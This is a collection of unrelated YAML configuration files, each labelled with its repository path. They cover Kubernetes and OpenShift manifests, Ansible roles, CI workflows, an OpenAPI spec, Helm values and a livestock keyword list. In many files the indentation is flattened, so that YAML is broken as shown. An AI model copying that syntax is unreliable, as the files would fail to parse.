namespace: ${parameters["namespace"]}
spec:
type: ClusterIP
selector:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
ports:
- name: http
protocol: TCP
port: 8000
targetPort: 8000
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
annotations:
kubernetes.io/ingress.class: "nginx"
name: spinnaker-demo
namespace: ${parameters["namespace"]}
labels:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
spec:
rules:
- host: '${parameters["host"]}'
http:
paths:
- backend:
serviceName: spinnaker-demo
servicePort: 8000
path: ${parameters["context"]}
|
manifests/demo.yml
|
openapi: "3.0.3"
info:
version: 0.0.2
title: Employee Sample specification
  description: Employee API
contact:
name: <NAME>
url: http://virtualan.io
email: <EMAIL>
license:
name: No license
servers:
- url: https://live.virtualandemo.com
description: Production server (uses live data)
- url: http://localhost:8800
description: Sandbox server (uses test data)
paths:
/employees:
post:
summary: Create a Employee
description: Create a new Employee object.
operationId: createEmployee
tags:
- employee
requestBody:
content:
application/json:
schema:
$ref: "#/components/schemas/Employee"
responses:
'201':
description: Employee created
'400':
description: Employee exists already. Choose another name.
'405':
description: Invalid input.
default:
description: unexpected error
content:
application/json:
schema:
$ref: "#/components/schemas/Error"
/employees/{employeeId}:
get:
summary: The GET Employee
operationId: employeeById
description: Sample path
tags:
- employee
parameters:
- name: employeeId
in: path
required: true
description: The id of the employee
schema:
type: string
responses:
'200':
description: Employee
content:
application/json:
schema:
$ref: "#/components/schemas/Employee"
'400':
description: Employee Invalid ID
'404':
description: Employee not found
default:
description: unexpected error
content:
application/json:
schema:
$ref: "#/components/schemas/Error"
components:
schemas:
Employee:
required:
- name
properties:
id:
type: integer
format: int64
example: 001
name:
type: string
example: Elan
gender:
type: string
example: 0.0.1
Error:
required:
- code
- message
properties:
code:
type: integer
format: int32
example: 404
message:
type: string
example: Unexpected error.
|
samples/virtualan-openapi-mongo/src/main/resources/META-INF/resources/yaml/Employee/Employee.yaml
|
# ------------------- Alertmanager Service ------------------- #
kind: Service
apiVersion: v1
metadata:
name: prometheus-alertmanager
namespace: monitoring
spec:
type: NodePort
ports:
- port: 9093
targetPort: 9093
nodePort: 30903
selector:
app: alertmanager
---
# ------------------- Alertmanager ConfigMap: alertmanager.yml ------------------- #
apiVersion: v1
kind: ConfigMap
metadata:
creationTimestamp: null
name: prometheus-alertmanager
namespace: monitoring
data:
alertmanager.yml: |
global:
smtp_smarthost: 'mailhog.monitoring.svc.cluster.local:1025'
smtp_from: '<EMAIL>'
smtp_require_tls: false
smtp_hello: 'k8s-alertmanager'
# Default route
route:
group_by: [cluster, alertname, resource, severity]
# Default receiver
receiver: test-emails
# Child routes
routes:
# Creating a rule for CPU related alerts
- match_re:
resource: ^cpu$
receiver: cpu-mails
# Sub route for critical CPU alerts
routes:
- match:
severity: critical
receiver: crit-mails
# Setting different receivers
receivers:
- name: 'test-emails'
email_configs:
- to: '<EMAIL>'
- name: 'cpu-mails'
email_configs:
- to: '<EMAIL>'
- name: 'crit-mails'
email_configs:
- to: '<EMAIL>'
---
# ------------------- Alertmanager Deployment ------------------- #
apiVersion: apps/v1
kind: Deployment
metadata:
name: prometheus-alertmanager
namespace: monitoring
labels:
app: alertmanager
spec:
selector:
matchLabels:
app: alertmanager
template:
metadata:
name: alertmanager
labels:
app: alertmanager
annotations:
prometheus.io/scrape: "true"
prometheus.io/port: "9093"
prometheus.io/part_of: "true"
spec:
containers:
- name: alertmanager
image: prom/alertmanager:v0.15.2
ports:
- containerPort: 9093
volumeMounts:
- name: alertmanager-rules
mountPath: /etc/alertmanager
volumes:
- name: alertmanager-rules
configMap:
name: prometheus-alertmanager
|
src/100-classic/300-alertmanager-full.yml
|
---
- name: install dependencies
apt:
name: "{{ item }}"
with_items:
- linux-tools-{{ ansible_kernel }} # for cpupower, used in prolog+epilog
when: ansible_os_family == "Debian"
- name: install dependencies
yum:
name: "{{ item }}"
with_items:
- kernel-tools # for cpupower, used in prolog+epilog
when: ansible_os_family == "RedHat"
- name: delete old prolog files
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: absent
with_items:
- prolog.sh
- prolog.d
- prolog-parts.d
- prolog-exclusive.d
tags: prolog
when: slurm_clear_old_prolog_epilog
- name: delete old epilog files
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: absent
with_items:
- epilog.sh
- epilog.d
- epilog-parts.d
- epilog-exclusive.d
- epilog-last-user.d
tags: epilog
when: slurm_clear_old_prolog_epilog
- name: create prolog directories
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: directory
owner: slurm
group: slurm
mode: 0755
with_items:
- prolog.d/
tags:
- prolog
- name: create epilog directories
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: directory
owner: slurm
group: slurm
mode: 0755
with_items:
- epilog.d/
tags:
- epilog
# Deploy the prolog/epilog entry scripts and their part scripts. File modes
# are quoted strings: unquoted 0755 is a YAML 1.1 octal-integer literal,
# which Ansible's docs warn against for the mode parameter.
- name: copy prolog script
  template:
    src: etc/slurm/prolog.sh
    dest: "{{ slurm_config_dir }}/"
    mode: "0755"
  tags:
    - prolog
- name: copy prolog parts
  template:
    src: "{{ item }}"
    dest: "{{ slurm_config_dir }}/prolog.d/"
    owner: slurm
    group: slurm
    mode: "0755"
  with_fileglob: "{{ prolog_fileglob }}"
  tags:
    - prolog
- name: copy epilog script
  template:
    src: etc/slurm/epilog.sh
    dest: "{{ slurm_config_dir }}/"
    mode: "0755"
  tags:
    - epilog
- name: copy epilog parts
  template:
    src: "{{ item }}"
    dest: "{{ slurm_config_dir }}/epilog.d/"
    owner: slurm
    group: slurm
    mode: "0755"
  with_fileglob: "{{ epilog_fileglob }}"
  tags:
    - epilog
|
roles/slurm/tasks/prolog_epilog.yml
|
---
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# name: tftpboot_configure/defaults
# description: ALL our default variables for tftpboot_configure go in here
#------------------------------------------------------------------------------
# Packages - All our required packages we need installing
#------------------------------------------------------------------------------
# - variables -
tftp_mirror: archive.ubuntu.com # Where will we pull our linux boot environment from
tftp_proxy: blank # What proxy will we use, if any.
tftp_distro: [ xenial ] # What distribution will we pull
tftp_files: [ initrd.gz, linux ]
ntp_server: pool.ntp.org
atftpd_path: /srv/tftp # What is the path for our tftpd
tftp_source: /srv/tftp_source/ # What is the path where the source pxe config files are placed per server
atftp_user: nobody # What user does this environment get set up as
atftp_group: nogroup # What group does this environment get set up as
preseed_password: <PASSWORD> # Default password placed into pre-seed file
vm_disk_device: vda # Default disk device used in pre-seed
vm_net_iface: ens3 # Default interface used in pre-seed
ssh_key: blank
# These below variables rely on apache being set up and is where the preseed is set up
preseed_apache_url: pxe # What is the url http://server/THISVARHERE
preseed_path: /var/www/pxe # What path
webserver_ip_address: "{{ ansible_default_ipv4.address }}"
server_list: # What is our list of servers
- name: blank
hwaddr: "aa:aa:aa:aa:aa:aa"
distro: xenial
preseed_file: my-preseed-file # Allow a custom preseed on a per server basis
|
multi-node-aio-xenial-ansible/roles/tftpboot_configure/defaults/main.yml
|
name: 'Qodana Scan'
description: 'Scan your projects with Qodana on GitHub. Docs: https://jb.gg/qodana-github-action'
author: 'JetBrains'
branding:
color: "black"
icon: "bar-chart-2"
inputs:
linter:
description: 'Qodana linter – [official Qodana Docker image](#supported-qodana-docker-images).'
required: true
default: "jetbrains/qodana-jvm-community:latest"
project-dir:
description: 'Root directory of the project to be analyzed'
required: false
default: "${{ github.workspace }}"
results-dir:
description: 'Directory to store the analysis results'
required: false
default: "${{ runner.temp }}/qodana/results"
cache-dir:
description: 'Directory to store Qodana caches'
required: false
default: "${{ runner.temp }}/qodana/caches"
idea-config-dir:
description: 'IntelliJ IDEA configuration directory'
required: false
gradle-settings-path:
description: 'Provide path to gradle.properties file. An example: "/your/custom/path/gradle.properties"'
required: false
additional-volumes:
description: 'Mount additional volumes to Docker container'
required: false
additional-env-variables:
description: 'Pass additional environment variables to docker container'
required: false
fail-threshold:
description: 'Set the number of problems that will serve as a quality gate. If this number is reached, the pipeline run is terminated'
required: false
inspected-dir:
description: 'Directory to be inspected. If not specified, the whole project is inspected by default'
required: false
baseline-path:
description: 'Run in baseline mode. Provide the path to an existing SARIF report to be used in the baseline state calculation'
required: false
baseline-include-absent:
description: 'Include the results from the baseline absent in the current Qodana run in the output report'
required: false
default: "false"
changes:
description: 'Inspect uncommitted changes and report new problems'
required: false
default: "false"
script:
description: 'Override the default docker scenario'
required: false
profile-name:
description: 'Name of a profile defined in the project'
required: false
profile-path:
description: 'Absolute path to the profile file'
required: false
upload-result:
description: 'Upload Qodana results as an artifact to the job'
required: false
default: "true"
use-caches:
description: 'Utilize GitHub caches for Qodana runs'
required: false
default: "true"
use-annotations:
description: 'Use annotation to mark the results in the GitHub user interface'
required: false
default: "true"
github-token:
description: 'GitHub token to be used for uploading annotations'
required: false
    default: "${{ github.token }}"
runs:
using: 'node12'
main: 'dist/index.js'
|
action.yaml
|
name: Standard Pipeline
on:
pull_request:
branches: '**'
push:
branches:
- develop
schedule:
- cron: '0 20 * * 5'
jobs:
outdated:
runs-on: ubuntu-latest
if: startsWith(github.head_ref, 'renovate') == false
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt --user
- name: outdated
run: pip list --outdated --not-required --user | grep . && echo "there are outdated packages" && exit 1 || echo "all packages up to date"
black:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: black
run: black --check .
isort:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: isort
run: isort --check .
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: test
run: python -m unittest discover
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install bandit
run: pip install bandit==1.6.2
- name: bandit
run: bandit -r *.py -f json -o report.json
- name: show report
if: ${{ success() || failure() }}
run: cat report.json
- name: upload report
if: ${{ success() || failure() }}
uses: actions/upload-artifact@v2
with:
name: Bandit Security Report
path: report.json
docker:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: docker build
run: docker build -t python-demo .
|
.github/workflows/basic.yml
|
items:
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions'
name: AzureTokenCredentialsOptions
fullName: AzureTokenCredentialsOptions
children:
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.environment'
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenAudience'
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenCache'
langs:
- typeScript
type: interface
summary: ''
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.environment'
name: environment
fullName: environment
children: []
langs:
- typeScript
type: property
summary: '{AzureEnvironment} [environment] - environnement pour s’authentifier auprès de Azure.'
optional: true
syntax:
content: 'environment?: Environment'
return:
type:
- Environment
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenAudience'
name: tokenAudience
fullName: tokenAudience
children: []
langs:
- typeScript
type: property
summary: "{TokenAudience} [tokenAudience] - le public pour lequel le jeton est demandé. Les valeurs valides sont «\_graphique\_», «\_batch\_», ou toute autre ressource tels que «https://vault.azure.net/».\nSi tokenAudience est «\_graphique\_» puis domaine doit également être fourni et sa valeur ne doit pas être le locataire «\_commune\_» par défaut. Il doit être une chaîne (de préférence dans un format guid)."
optional: true
syntax:
content: 'tokenAudience?: TokenAudience'
return:
type:
- '@azure/ms-rest-nodeauth.TokenAudience'
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenCache'
name: tokenCache
fullName: tokenCache
children: []
langs:
- typeScript
type: property
summary: '{TokenCache} [tokenCache] - le cache de jetons. Valeur par défaut est MemoryCache à partir de la bibliothèque adal.'
optional: true
syntax:
content: 'tokenCache?: adal.TokenCache'
return:
type:
- adal.TokenCache
package: '@azure/ms-rest-nodeauth'
references:
- uid: '@azure/ms-rest-nodeauth.TokenAudience'
name: TokenAudience
spec.typeScript:
- name: TokenAudience
fullName: TokenAudience
uid: '@azure/ms-rest-nodeauth.TokenAudience'
|
docs-ref-autogen/@azure/ms-rest-nodeauth/AzureTokenCredentialsOptions.yml
|
items:
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions
name: ExtensionFilterOptions
fullName: ExtensionFilterOptions
children:
- vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.All
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.None
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.Bundle
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.AccountAssignment
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.ImplicitAssignment
langs:
- typeScript
type: enum
summary: ''
source:
path: vss.d.ts
startLine: 27476
remote:
path: typings\vss.d.ts
repo: 'https://github.com/Microsoft/vss-web-extension-sdk.git'
branch: master
package: vss-web-extension-sdk
module: VSS/Licensing/Contracts
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.All
name: All
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: -1
module: VSS/Licensing/Contracts
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.None
name: None
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 1
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.Bundle
name: Bundle
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 2
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.AccountAssignment
name: AccountAssignment
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 4
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.ImplicitAssignment
name: ImplicitAssignment
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 8
module: VSS/Licensing/Contracts
|
docs-ref-autogen/vss-web-extension-sdk/VSS.Licensing.Contracts.ExtensionFilterOptions.yml
|
- include: compare_base.yml
with_items: "{{ execute_compare_base_features }}"
when: execute_compare_base
# Get runtime status for Master
# Query the master appliance's runtime status once; the result gates the
# feature-comparison includes that follow.
- name: Get all reverse proxies in {{ master_hostname }}
  ibm.isam.isam:
    appliance: "{{ master_hostname }}"
    log: "{{ log_level | default('INFO') }}"
    force: "{{ force | default(False) }}"
    action: ibmsecurity.isam.web.runtime.process.get
  run_once: true  # canonical lowercase boolean (yamllint truthy)
  register: master_web_runtime
- include: compare_base.yml
with_items: "{{ execute_compare_wga_features }}"
when: execute_compare_wga and ('wga' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_mga_features }}"
when: execute_compare_mga and ('mga' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_fed_features }}"
when: execute_compare_fed and ('federation' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_mga_or_fed_features }}"
when: (execute_compare_fed and ('federation' in master_web_runtime['ansible_facts']['activations'])) or (execute_compare_mga and ('mga' in master_web_runtime['ansible_facts']['activations']))
# Compare runtime configuration files of an appliance
- include: compare_runtime_config.yml
with_items:
- pd.conf
- ivmgrd.conf
- ldap.conf
loop_control:
loop_var: resource_id
when: execute_compare_web_runtime and master_web_runtime['data']['modecode'] != '-1'
# Get all reverse proxies in master appliance
# List the reverse-proxy instances on the master appliance; only runs when
# the web runtime is configured and the wga module is activated.
- name: Get all reverse proxies in {{ master_hostname }}
  ibm.isam.isam:
    appliance: "{{ master_hostname }}"
    log: "{{ log_level | default('INFO') }}"
    force: "{{ force | default(False) }}"
    action: ibmsecurity.isam.web.reverse_proxy.instance.get
  when: execute_compare_reverseproxy and master_web_runtime['data']['modecode'] != '-1' and ('wga' in master_web_runtime['ansible_facts']['activations'])
  ignore_errors: true  # comparison should continue even if this lookup fails
  run_once: true
  register: master_rps
- include: compare_reverseproxy_config.yml
with_items: "{{ master_rps['data'] }}"
loop_control:
loop_var: reverseproxy
when: execute_compare_reverseproxy and master_web_runtime['data']['modecode'] != '-1' and ('wga' in master_web_runtime['ansible_facts']['activations'])
# Get all Certificate Databases in master appliance
# List the certificate databases on the master appliance for the
# certificate-comparison include that follows.
- name: Get all certificate stores in {{ master_hostname }}
  ibm.isam.isam:
    appliance: "{{ master_hostname }}"
    log: "{{ log_level | default('INFO') }}"
    force: "{{ force | default(False) }}"
    action: ibmsecurity.isam.base.ssl_certificates.certificate_databases.get_all
  when: execute_compare_certs
  ignore_errors: true  # comparison should continue even if this lookup fails
  run_once: true
  register: master_cert_dbs
- include: compare_certificate_databases.yml
with_items: "{{ master_cert_dbs['data'] }}"
loop_control:
loop_var: cert_db
when: execute_compare_certs
|
roles/execute_compare/tasks/main.yml
|
fields:
- description
keywords:
- abattoir
- animal
- bull
- canine
- cat
- cattle
- chicken
- cow
- dog
- duck
- farm
- feline
- geese
- goat
- goose
- hen
- kitten
- livestock
- pig
- poultry
- puppies
- puppy
- swine
- turkey
- fish
- lamb
- sheep
- veal
- fishery
  # Below obtained from https://www.mla.com.au/general/glossary/#glossarySection_A
- agent # Sells and buys cattle on behalf of clients
- AuctionsPlus # Internet based livestock auction system
- bobby
- calf
- backgrounder # A cattle producer who produces young cattle ready for lot feeding
- blue tag # A tail tag on a cow at a physical market
- boning room # Area of an abattoir where the carcase is cut into smaller portions
- beef
- carcase
- CL # Chemical lean
- chemical lean
- conditioning
- crossbred
- crossbreeding
- CWE # Carcase weight equivalent
- CWT # Carcase weight
- dam # Mother of a particular calf
- damara # South African fat-tailed meat breed of sheep
- $/head # Dollars per head of lives stock. Units by which cattle are sold at store sale.
- DCW # Dressed carcase weight
- DWT # Dressed weight
- ewe # Female sheep with more than two permanent teeth
- EYCI # Eastern Young Cattle Indicator, used as a general cattle market benchmark
- fat score # Measure of fat cover across an animal's ribs and rump
- feeders
- feedlot
- grainfed
- grassfed
- grazier # A farmer which raises livestock such as sheep or cattle
- mutton
- heifer
- HGP # Hormone growth promotant
- hogget # Castrated male and female sheep with no 'ram like' characteristics and up to two permanent teeth.
- ox
- killing # Killing floor, etc etc
- LWT # Liveweight - the weight of a live animal
- LMO # Livestock market officer
- longfed # An animal that is grainfed, in a feedlot, for an extended period of time.
- lotfed
  - MSA # Meat Standards Australia
- Meatworks
- MLA # Meat and Livestock Australia
- NLIS # National Livestock Identification System
- NLRS # National Livestock Reporting Service
- NSM # Non-station mated - refers to when a cow or heifer has not been intentionally exposed to a bull
- OTH # Over the hooks - refers to the marketing of cattle/sheep/lambs directly from the farm to an abattoir where a producer is paid for the value of the carcase based on a sliding grid
- pastoralist
- PTIC # Pregnancy tested in calf
- PTNIC # Pregnancy tested not in calf
- ram
- saleyard
- second-cross # The breed developed by mating a meat breed ram with a first-cross ewe
- shortfed
- slaughter
- steer
- yardings # Number of cattle offered for sale at a saleyard auction
- yearling # Young animal, fully weaned without permanent incisor teeth
|
config/planning-alerts.yaml
|
kind: Template
apiVersion: v1
labels:
app: cloud9
template: cloud9
metadata:
name: cloud9
annotations:
openshift.io/display-name: "Cloud9 IDE"
description: "Cloud9 IDE template.\n\nWARNING: Any data stored will be lost upon pod destruction."
openshift.io/long-description: "Cloud9 IDE template.\n\nWARNING: Any data stored will be lost upon pod destruction."
tags: "ide,development,quickstart"
iconClass: "fa fa-code"
openshift.io/provider-display-name: "A-State Computer Science Department"
objects:
- apiVersion: v1
kind: Service
metadata:
name: cloud9
spec:
ports:
- name: http
port: 8181
protocol: TCP
targetPort: 8181
selector:
app: cloud9
- apiVersion: v1
kind: Route
metadata:
name: cloud9
spec:
tls:
termination: edge
to:
kind: Service
name: cloud9
- apiVersion: v1
kind: DeploymentConfig
metadata:
name: cloud9
spec:
replicas: 1
selector:
app: cloud9
strategy:
type: Rolling
template:
metadata:
labels:
app: cloud9
spec:
containers:
- env:
name: cloud9
image: 'cloud9:latest'
imagePullPolicy: Always
livenessProbe:
failureThreshold: 11
initialDelaySeconds: 80
periodSeconds: 5
successThreshold: 1
tcpSocket:
port: 8181
timeoutSeconds: 30
ports:
- containerPort: 8181
protocol: TCP
volumeMounts:
- mountPath: '/workspace'
name: cloud9-data
restartPolicy: Always
volumes:
- name: cloud9-data
persistentVolumeClaim:
claimName: cloud9-data
triggers:
- type: ConfigChange
- type: "ImageChange"
imageChangeParams:
automatic: true
from:
kind: "ImageStreamTag"
name: "cloud9:latest"
namespace: "openshift"
containerNames:
- "cloud9"
- kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: cloud9-data
labels:
app: cloud9
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
|
v3/cloud9.yaml
|
heat_template_version: pike
description: >
Tenant IPv6 network.
parameters:
# the defaults here work for static IP assignment (IPAM) only
TenantNetCidr:
# OpenStack uses the EUI-64 address format, which requires a /64 prefix
default: 'fd00:fd00:fd00:5000::/64'
description: Cidr for the tenant network.
type: string
TenantNetValueSpecs:
default: {'provider:physical_network': 'tenant', 'provider:network_type': 'flat'}
description: Value specs for the tenant network.
type: json
TenantNetAdminStateUp:
default: false
    description: The admin state of the network.
type: boolean
TenantNetShared:
default: false
description: Whether this network is shared across all tenants.
type: boolean
TenantNetName:
default: tenant
description: The name of the tenant network.
type: string
TenantSubnetName:
default: tenant_subnet
description: The name of the tenant subnet in Neutron.
type: string
TenantAllocationPools:
default: [{'start': 'fd00:fd00:fd00:5000::10', 'end': 'fd00:fd00:fd00:5000:ffff:ffff:ffff:fffe'}]
description: Ip allocation pool range for the tenant network.
type: json
IPv6AddressMode:
default: dhcpv6-stateful
description: Neutron subnet IPv6 address mode
type: string
IPv6RAMode:
default: dhcpv6-stateful
description: Neutron subnet IPv6 router advertisement mode
type: string
resources:
TenantNetwork:
type: OS::Neutron::Net
properties:
admin_state_up: {get_param: TenantNetAdminStateUp}
name: {get_param: TenantNetName}
shared: {get_param: TenantNetShared}
value_specs: {get_param: TenantNetValueSpecs}
TenantSubnet:
type: OS::Neutron::Subnet
properties:
ip_version: 6
ipv6_address_mode: {get_param: IPv6AddressMode}
ipv6_ra_mode: {get_param: IPv6RAMode}
cidr: {get_param: TenantNetCidr}
name: {get_param: TenantSubnetName}
network: {get_resource: TenantNetwork}
allocation_pools: {get_param: TenantAllocationPools}
gateway_ip: null
outputs:
OS::stack_id:
description: Neutron tenant network
value: {get_resource: TenantNetwork}
|
network/tenant_v6.yaml
|
infra:
clusterName: "kubernetes"
cloudControllerManager:
enabled: true
allocateNodeCidrs: "true"
# bindAddress: "0.0.0.0"
caCertDir: "/etc/ssl"
# certDir: "/path/to/certs"
cloudConfig: "/etc/kubernetes/azure.json"
# cloudConfigSecretName: "azure-cloud-provider"
clusterCIDR: "10.244.0.0/16"
configureCloudRoutes: "true" # "false" for Azure CNI and "true" for other network plugins
# contentionProfiling: "true"
# controllerStartInterval: "2m"
# enableDynamicReloading: "true"
# http2MaxStreamsPerConnection: "47"
imageRepository: "mcr.microsoft.com/oss/kubernetes"
imageName: "azure-cloud-controller-manager"
#imageTag: "v1.23.11"
imagePullPolicy: "IfNotPresent"
# kubeAPIBurst: "100"
# kubeAPIContentType: "application/vnd.kubernetes.protobuf"
# kubeAPIQPS: "50.0"
# kubeconfig: "/kubeconfig"
leaderElect: "true"
# leaderElectLeaseDuration: "30s"
# leaderElectRenewDeadline: "15s"
# leaderElectRetryPeriod: "5s"
# leaderElectResourceLock: "configmap"
logVerbosity: "2"
# master: "192.168.4.20"
# minResyncPeriod: "100m"
# nodeStatusUpdateFrequency: "10m"
port: 10267
replicas: 1
# profiling: "false"
routeReconciliationPeriod: "10s"
# securePort: 10001
# useServiceAccountCredentials: "false"
containerResourceManagement:
requestsCPU: "100m"
requestsMem: "128Mi"
limitsCPU: "4"
limitsMem: "2Gi"
cloudNodeManager:
enabled: true
imageRepository: "mcr.microsoft.com/oss/kubernetes"
imageName: "azure-cloud-node-manager"
#imageTag: "v1.23.11"
imagePullPolicy: "IfNotPresent"
# cloudConfig: "/etc/kubernetes/azure.json"
# kubeAPIBurst: "100"
# kubeAPIContentType: "application/vnd.kubernetes.protobuf"
# kubeAPIQPS: "50.0"
# kubeconfig: "/kubeconfig"
# master: "192.168.4.20"
# minResyncPeriod: "100m"
# nodeStatusUpdateFrequency: "10m"
# waitRoutes: "false"
# useInstanceMetadata: "true"
containerResourceManagement:
requestsCPU: "50m"
requestsMem: "50Mi"
limitsCPU: "2"
limitsMem: "512Mi"
requestsCPUWin: "50m"
requestsMemWin: "50Mi"
limitsCPUWin: "2"
limitsMemWin: "512Mi"
|
helm/cloud-provider-azure/values.yaml
|
---
- name: Creating Directory Structure
file:
path: "{{ item }}"
state: directory
with_items:
- ~/.config/pet
- ~/.local/bin
- ~/.ssh
- ~/bin
- ~/work/media/images
- ~/work/media/videos
- ~/work/others
- ~/work/programming/projects
- ~/work/programming/sources
- ~/work/tmp
- ~/work/tools
- ~/work/vms
- ~/work/warehouse
- name: Creating ~/work/{documents, downloads}
block:
- name: Moving Files
command: mv "{{ item.src }}" "{{ item.dst }}"
args:
creates: "{{ item.dst }}"
with_items:
- { src: ~/Documents, dst: ~/work/documents }
- { src: ~/Downloads, dst: ~/work/downloads }
- name: Creating Symlinks
file:
src: "{{ item.src }}"
dest: "{{ item.symlink }}"
state: link
with_items:
- { src: ~/work/documents, symlink: ~/Documents }
- { src: ~/work/downloads, symlink: ~/Downloads }
- name: Downloading Things
block:
- name: Firefox
get_url:
backup: yes
url: https://download.mozilla.org/?product=firefox-nightly-latest-ssl&os=linux64&lang=en-US
dest: ~/work/tools/firefox.tar.bz2
- name: Extracting Firefox
unarchive:
remote_src: yes
src: ~/work/tools/firefox.tar.bz2
dest: ~/work/tools/
creates: ~/work/tools/firefox/
- name: Thunderbird
get_url:
backup: yes
url: https://download.mozilla.org/?product=thunderbird-beta-latest-SSL&os=linux64&lang=en-US
dest: ~/work/tools/thunderbird.tar.bz2
- name: Extracting Thunderbird
unarchive:
remote_src: yes
src: ~/work/tools/thunderbird.tar.bz2
dest: ~/work/tools/
creates: ~/work/tools/thunderbird/
- name: Pet
get_url:
backup: yes
url: https://github.com/knqyf263/pet/releases/download/v0.3.6/pet_0.3.6_linux_amd64.tar.gz
dest: ~/work/tools/pet.tar.gz
checksum: sha256:60f977ec23b219551186edab88264a5a3475663007a3cc0f0873785e603335bb
- name: Extracting Pet
unarchive:
remote_src: yes
src: ~/work/tools/pet.tar.gz
dest: ~/bin/
creates: ~/bin/pet/
extra_opts:
- --transform
- s,^,pet/,
- name: FiraCode Font
get_url:
backup: yes
url: https://github.com/tonsky/FiraCode/releases/download/2/FiraCode_2.zip
dest: ~/work/tools/FiraCode.zip
checksum: sha256:60d5b1106b708cc134c521aae4e503bb1d2ec3c9bf8ad978f2c659820505d492
# Install oh-my-zsh with two community plugins, then make zsh the login
# shell. Every task in the block is named (ansible-lint name[missing]).
- name: Oh-My-Zsh
  block:
    - name: Cloning oh-my-zsh
      git:
        repo: https://github.com/robbyrussell/oh-my-zsh
        dest: ~/.oh-my-zsh
    - name: Cloning zsh-autosuggestions Plugin
      git:
        repo: https://github.com/zsh-users/zsh-autosuggestions
        dest: ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions
    - name: Cloning zsh-syntax-highlighting Plugin
      git:
        repo: https://github.com/zsh-users/zsh-syntax-highlighting
        dest: ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting
    - name: Setting Zsh As Login Shell
      user:
        name: "{{ ansible_user }}"
        shell: /bin/zsh
      become: true
      become_user: root
- name: Installing vscode Extensions
command: code --install-extension "{{ item }}"
with_items:
- bungcip.better-toml
- eamodio.gitlens
- lextudio.restructuredtext
- ms-azuretools.vscode-docker
- ms-python.python
- vscode-icons-team.vscode-icons
# Renders dotfiles and helper scripts from templates. `backup: true`
# keeps a copy of any file that gets overwritten. Scripts carry an
# executable mode; everything else falls back to the 0644 default.
- name: Copying Files
  template:
    backup: true
    src: "{{ item.src }}"
    dest: "{{ item.dst }}"
    # Modes are quoted strings throughout: a bare octal like 0644 would
    # otherwise be parsed by YAML as a decimal integer.
    mode: "{{ item.mode | default('0644') }}"
  with_items:
    - { src: files/gapull, dst: ~/bin/gapull, mode: "a+x" }
    - { src: files/gapush, dst: ~/bin/gapush, mode: "a+x" }
    - { src: files/zsh-shortcuts, dst: ~/bin/zsh-shortcuts, mode: "a+x" }
    - { src: files/ssh-config, dst: ~/.ssh/config, mode: "0600" }
    - { src: files/curlrc, dst: ~/.curlrc }
    - { src: files/gdbinit, dst: ~/.gdbinit }
